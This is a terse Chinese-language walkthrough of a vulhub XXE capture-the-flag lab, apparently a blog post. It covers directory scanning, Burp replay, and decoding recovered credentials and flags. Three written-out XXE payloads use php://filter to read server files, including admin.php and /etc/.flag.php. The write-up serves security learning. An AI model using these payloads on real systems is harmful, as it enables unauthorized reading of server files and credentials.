步骤一:搜索靶机地址
步骤二:利用dirsearsh扫描目录
步骤三:进入靶机
进入robots.txt
步骤四:访问/xxe
步骤五:输入用户名密码,利用burp抓包,传送至重放器
输入:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">
]>
<root><name>&admin;</name><password>admin</password></root>
进行base64解码有用户名密码
密码进行md5解密
步骤六:进入/xxe/admin.php输入用户名:administhebest 密码:admin@123
点击Flag
进入新目录
读取目录:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=./flagmeout.php">
]>
<root><name>&admin;</name><password>admin</password></root>
进行base64解码
得出Flag进行base32解码
得出结果进行base64解码
步骤七:读取目录
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/.flag.php">
]>
<root><name>&admin;</name><password>admin</password></root>
进行base64解码
步骤八:在www目录下添加php文件
访问本机php文件,得出结果
标签:vulhub,admin,步骤,解码,base64,xxe,靶机,目录 From: https://blog.csdn.net/2301_82061181/article/details/141684057